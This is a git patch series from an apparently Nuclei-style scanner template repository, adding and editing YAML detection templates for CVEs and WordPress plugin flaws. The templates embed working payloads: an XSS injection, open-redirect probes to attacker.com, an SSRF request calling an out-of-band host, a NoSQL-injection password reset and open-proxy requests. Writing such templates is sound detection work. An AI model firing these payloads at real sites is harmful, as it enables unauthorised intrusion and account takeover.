cves/2019/CVE-2019-9670.yaml by mp * Enhancement: cves/2019/CVE-2019-1821.yaml by mp * Enhancement: cves/2019/CVE-2019-18394.yaml by mp * Enhancement: cves/2019/CVE-2019-19781.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-5127.yaml by mp * Enhancement: cves/2019/CVE-2019-9618.yaml by mp * Enhancement: cves/2019/CVE-2019-9670.yaml by mp * Enhancement: cves/2005/CVE-2005-2428.yaml by mp * Enhancement: cves/2019/CVE-2019-2579.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-6112.yaml by mp * Enhancement: cves/2019/CVE-2019-9733.yaml by mp * Enhancement: cves/2020/CVE-2020-11034.yaml by mp * Enhancement: cves/2020/CVE-2020-11529.yaml by mp * Enhancement: cves/2020/CVE-2020-11546.yaml by mp * Enhancement: cves/2020/CVE-2020-12116.yaml by mp * Enhancement: cves/2020/CVE-2020-12447.yaml by mp * Enhancement: cves/2020/CVE-2020-17453.yaml by mp * Enhancement: cves/2020/CVE-2020-19360.yaml by mp * Enhancement: cves/2020/CVE-2020-2140.yaml by mp * Enhancement: cves/2020/CVE-2020-23575.yaml by mp * Enhancement: cves/2020/CVE-2020-24223.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-2579.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-6112.yaml by mp * Enhancement: cves/2019/CVE-2019-9733.yaml by mp * Enhancement: cves/2020/CVE-2020-11034.yaml by mp * Enhancement: cves/2020/CVE-2020-11529.yaml by mp * Enhancement: cves/2020/CVE-2020-12116.yaml by mp * Enhancement: cves/2020/CVE-2020-12447.yaml by mp * Enhancement: cves/2020/CVE-2020-2140.yaml by mp * Enhancement: cves/2020/CVE-2020-14092.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * standardizing enhanced by tag * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines Co-authored-by: sullo --- cves/2014/CVE-2014-9618.yaml | 2 ++ cves/2019/CVE-2019-18818.yaml | 2 ++ cves/2022/CVE-2022-26352.yaml | 4 +++- misconfiguration/proxy/metadata-alibaba.yaml | 1 + misconfiguration/proxy/open-proxy-localhost.yaml | 6 ++++++ 5 files changed, 14 insertions(+), 1 deletion(-) diff --git a/cves/2014/CVE-2014-9618.yaml b/cves/2014/CVE-2014-9618.yaml index bf8e5fbc31..7e809c5157 100644 --- a/cves/2014/CVE-2014-9618.yaml +++ b/cves/2014/CVE-2014-9618.yaml @@ -33,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/09 diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index e9773fd82e..3de85d0087 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml @@ -23,7 +23,9 @@ requests: Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/json + {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} + matchers-condition: and matchers: - type: status diff --git a/cves/2022/CVE-2022-26352.yaml b/cves/2022/CVE-2022-26352.yaml index 7e207f7d2c..711cc65c7a 100644 --- a/cves/2022/CVE-2022-26352.yaml +++ b/cves/2022/CVE-2022-26352.yaml @@ -8,6 +8,8 @@ info: reference: - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/ - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352 + classification: + cve-id: CVE-2022-26352 tags: cve,cve2022,rce,dotcms requests: @@ -36,4 +38,4 @@ requests: dsl: - 'contains(body_2, "CVE-2022-26352")' - 'status_code_2 == 200' - condition: and \ No newline at end of file + condition: and diff --git a/misconfiguration/proxy/metadata-alibaba.yaml b/misconfiguration/proxy/metadata-alibaba.yaml index fca319f76b..d7ffe67c09 100644 --- a/misconfiguration/proxy/metadata-alibaba.yaml +++ b/misconfiguration/proxy/metadata-alibaba.yaml @@ -29,6 +29,7 @@ requests: - |+ GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1 Host: {{hostval}} + payloads: hostval: - alibaba.interact.sh diff --git a/misconfiguration/proxy/open-proxy-localhost.yaml b/misconfiguration/proxy/open-proxy-localhost.yaml index 755194c333..23936c32ee 100644 --- a/misconfiguration/proxy/open-proxy-localhost.yaml +++ b/misconfiguration/proxy/open-proxy-localhost.yaml @@ -21,21 +21,27 @@ requests: - |+ GET / HTTP/1.1 Host: {{Hostname}} + - |+ GET http://somethingthatdoesnotexist/ HTTP/1.1 Host: somethingthatdoesnotexist + - |+ GET http://127.0.0.1/ HTTP/1.1 Host: 127.0.0.1 + - |+ GET https://127.0.0.1/ HTTP/1.1 Host: 127.0.0.1 + - |+ GET http://localhost/ HTTP/1.1 Host: localhost + - |+ GET https://localhost/ HTTP/1.1 Host: localhost + unsafe: true req-condition: true stop-at-first-match: true From 6c863e82e38cab32a1d8f28a5c6af07fb033d9a6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 10 May 2022 13:18:12 +0530 Subject: [PATCH 104/115] updated metadata --- cves/2009/CVE-2009-1872.yaml | 3 +++ exposed-panels/coldfusion-administrator-login.yaml | 2 ++ technologies/adobe/adobe-coldfusion-detect.yaml | 3 +++ technologies/adobe/adobe-coldfusion-error-detect.yaml | 3 +++ 4 files changed, 11 insertions(+) diff --git a/cves/2009/CVE-2009-1872.yaml b/cves/2009/CVE-2009-1872.yaml index efd1f70496..96c0351e1a 100644 --- a/cves/2009/CVE-2009-1872.yaml +++ b/cves/2009/CVE-2009-1872.yaml @@ -10,6 +10,9 @@ info: - https://www.tenable.com/cve/CVE-2009-1872 classification: cve-id: CVE-2009-1872 + metadata: + verified: true + shodan-query: http.component:"Adobe ColdFusion" tags: cve,cve2009,adobe,xss,coldfusion requests: diff --git a/exposed-panels/coldfusion-administrator-login.yaml b/exposed-panels/coldfusion-administrator-login.yaml index 9a0909c09a..51d8b79fed 100644 --- a/exposed-panels/coldfusion-administrator-login.yaml +++ b/exposed-panels/coldfusion-administrator-login.yaml @@ -6,6 +6,8 @@ info: severity: info reference: - https://www.shodan.io/search?query=http.title%3A%22ColdFusion+Administrator+Login%22 + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: panel,coldfusion,adobe requests: diff --git a/technologies/adobe/adobe-coldfusion-detect.yaml b/technologies/adobe/adobe-coldfusion-detect.yaml index 0d9330c87c..8bd7130d99 100644 --- a/technologies/adobe/adobe-coldfusion-detect.yaml +++ b/technologies/adobe/adobe-coldfusion-detect.yaml @@ -5,6 +5,9 @@ info: author: philippedelteil severity: info description: With this template we can detect the version number of Coldfusion instances based on their logos. + metadata: + verified: true + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion requests: diff --git a/technologies/adobe/adobe-coldfusion-error-detect.yaml b/technologies/adobe/adobe-coldfusion-error-detect.yaml index 37f553deb8..57e6f15254 100644 --- a/technologies/adobe/adobe-coldfusion-error-detect.yaml +++ b/technologies/adobe/adobe-coldfusion-error-detect.yaml @@ -7,6 +7,9 @@ info: description: With this template we can detect a running ColdFusion instance due to an error page. reference: - https://twitter.com/PhilippeDelteil/status/1418622775829348358 + metadata: + verified: true + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion requests: From 28788419f49f368250530a0bfb03926cf216883e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 10 May 2022 14:17:58 +0530 Subject: [PATCH 106/115] Create CVE-2022-28290.yaml --- cves/2022/CVE-2022-28290.yaml | 37 +++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2022/CVE-2022-28290.yaml diff --git a/cves/2022/CVE-2022-28290.yaml b/cves/2022/CVE-2022-28290.yaml new file mode 100644 index 0000000000..7d5b8760cb --- /dev/null +++ b/cves/2022/CVE-2022-28290.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-28290 + +info: + name: Country Selector < 1.6.6 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: The plugin does not sanitise and escape the country and lang parameters before outputting them back in the response, leading to a Reflected Cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/6c5a4bce-6266-4cfc-bc87-4fc3e36cb479 + tags: xss,wp,wordpress,wp-plugin,cve,cve2022 + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + country=%3Cimg%2Bsrc%3Dx%2Bonerror%3Dalert%28%2FXSS-country%2F%29%3E&lang=%3Cimg%2Bsrc%3Dx%2Bonerror%3Dalert%28%2FXSS-lang%2F%29%3E&site_locate=en-US + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - '' + condition: or + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 86111af04055d01713e50cfec86a05f6b1dbff5e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 May 2022 08:48:20 +0000 Subject: [PATCH 107/115] Auto Generated New Template Addition List [Tue May 10 08:48:20 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fc98efdc01..ef177a8480 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ cves/2022/CVE-2022-1040.yaml +cves/2022/CVE-2022-28290.yaml cves/2022/CVE-2022-29548.yaml From cda8849beba7600157ffd49a89ffbba64dec4276 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 10 May 2022 14:18:33 +0530 Subject: [PATCH 108/115] Revert "Create CVE-2022-28290.yaml" This reverts commit 28788419f49f368250530a0bfb03926cf216883e. --- cves/2022/CVE-2022-28290.yaml | 37 ----------------------------------- 1 file changed, 37 deletions(-) delete mode 100644 cves/2022/CVE-2022-28290.yaml diff --git a/cves/2022/CVE-2022-28290.yaml b/cves/2022/CVE-2022-28290.yaml deleted file mode 100644 index 7d5b8760cb..0000000000 --- a/cves/2022/CVE-2022-28290.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2022-28290 - -info: - name: Country Selector < 1.6.6 - Reflected Cross-Site Scripting - author: Akincibor - severity: medium - description: The plugin does not sanitise and escape the country and lang parameters before outputting them back in the response, leading to a Reflected Cross-Site Scripting. - reference: - - https://wpscan.com/vulnerability/6c5a4bce-6266-4cfc-bc87-4fc3e36cb479 - tags: xss,wp,wordpress,wp-plugin,cve,cve2022 - -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - - country=%3Cimg%2Bsrc%3Dx%2Bonerror%3Dalert%28%2FXSS-country%2F%29%3E&lang=%3Cimg%2Bsrc%3Dx%2Bonerror%3Dalert%28%2FXSS-lang%2F%29%3E&site_locate=en-US - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - '' - condition: or - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 From ab4bae17beb28a247aa970a1c8ef7fe10680be72 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 May 2022 08:48:58 +0000 Subject: [PATCH 109/115] Auto Generated New Template Addition List [Tue May 10 08:48:58 UTC 2022] :robot: --- .new-additions | 1 - 1 file changed, 1 deletion(-) diff --git a/.new-additions b/.new-additions index ef177a8480..fc98efdc01 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,2 @@ cves/2022/CVE-2022-1040.yaml -cves/2022/CVE-2022-28290.yaml cves/2022/CVE-2022-29548.yaml From 7003c19dda097ecd916fd220c00f7331537fbb39 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 10 May 2022 14:33:03 +0530 Subject: [PATCH 110/115] Create wp-security-open-redirect.yaml --- .../wordpress/wp-security-open-redirect.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-security-open-redirect.yaml diff --git a/vulnerabilities/wordpress/wp-security-open-redirect.yaml b/vulnerabilities/wordpress/wp-security-open-redirect.yaml new file mode 100644 index 0000000000..6a14088004 --- /dev/null +++ b/vulnerabilities/wordpress/wp-security-open-redirect.yaml @@ -0,0 +1,24 @@ +id: wp-security-open-redirect + +info: + name: All In One WP Security & Firewall <= 4.4.1 - Open Redirect & Hidden Login Page Exposure + author: akincibor + severity: low + description: | + The All In One WP Security & Firewall plugin suffers from open redirect and exposure of the actual URL of the "hidden login page" feature. + reference: + - https://wpscan.com/vulnerability/9898 + metadata: + verified: true + tags: wp-plugin,redirect,wordpress,wp + +requests: + - method: GET + path: + - "{{BaseURL}}/?aiowpsec_do_log_out=1&after_logout=https://attacker.com" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 From 3c3cae8c297d7a730b2daf4d3db44629d25331d1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 May 2022 09:09:19 +0000 Subject: [PATCH 111/115] Auto Generated New Template Addition List [Tue May 10 09:09:19 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fc98efdc01..20c8d9d40b 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ cves/2022/CVE-2022-1040.yaml cves/2022/CVE-2022-29548.yaml +vulnerabilities/wordpress/wp-security-open-redirect.yaml From 91a4cd3fa01712f077e6b843aeb5d86346c5da71 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 10 May 2022 14:44:58 +0530 Subject: [PATCH 112/115] Create newsletter-manager-open-redirect.yaml --- .../newsletter-manager-open-redirect.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml diff --git a/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml b/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml new file mode 100644 index 0000000000..2b65920e1e --- /dev/null +++ b/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml @@ -0,0 +1,24 @@ +id: newsletter-manager-open-redirect + +info: + name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect + author: akincibor + severity: low + description: | + The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue. + reference: + - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1 + metadata: + verified: true + tags: wp-plugin,redirect,wordpress,wp,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ==" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 From 2a4ee8839a25373ae26105cb4fd964f0df3c48be Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 May 2022 09:17:32 +0000 Subject: [PATCH 113/115] Auto Generated New Template Addition List [Tue May 10 09:17:32 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 20c8d9d40b..85a125f114 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ cves/2022/CVE-2022-1040.yaml cves/2022/CVE-2022-29548.yaml +vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml vulnerabilities/wordpress/wp-security-open-redirect.yaml From f7fd0efead5c96608cab98638706db80359c91f6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 10 May 2022 15:00:09 +0530 Subject: [PATCH 114/115] Create wp-under-construction-ssrf.yaml --- .../wordpress/wp-under-construction-ssrf.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-under-construction-ssrf.yaml diff --git a/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml b/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml new file mode 100644 index 0000000000..2b8590d60e --- /dev/null +++ b/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml @@ -0,0 +1,30 @@ +id: wp-under-construction-ssrf + +info: + name: Under Construction, Coming Soon & Maintenance Mode < 1.1.2 - Server Side Request Forgery (SSRF) + author: Akincibor + severity: high + description: | + The includes/mc-get_lists.php file used the 'apiKey' POST parameter to create an https URL from it without sanitisation and called it with cURL, leading to a SSRF issue. The issue is exploitable via direct access to the affected file, and ucmm_mc_api AJAX call (available to both authenticated and unauthenticated users). + reference: + - https://wpscan.com/vulnerability/24784c84-3efd-4166-81c1-e5a266562cfc + - https://packetstormsecurity.com/files/161576/ + metadata: + verified: true + tags: ssrf,wp,wp-plugin,wordpress,unauth + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/2 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + action=ucmm_mc_api&apiKey=-{{interactsh-url}}%2Ftest%2Ftest%2Ftest%3Fkey1%3Dval1%26dummy%3D + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 5d0f8a724ef20bb8741a3c00e3e77fdad825193a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 May 2022 10:00:06 +0000 Subject: [PATCH 115/115] Auto Generated New Template Addition List [Tue May 10 10:00:06 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 85a125f114..bfaf5de115 100644 --- a/.new-additions +++ b/.new-additions @@ -2,3 +2,4 @@ cves/2022/CVE-2022-1040.yaml cves/2022/CVE-2022-29548.yaml vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml vulnerabilities/wordpress/wp-security-open-redirect.yaml +vulnerabilities/wordpress/wp-under-construction-ssrf.yaml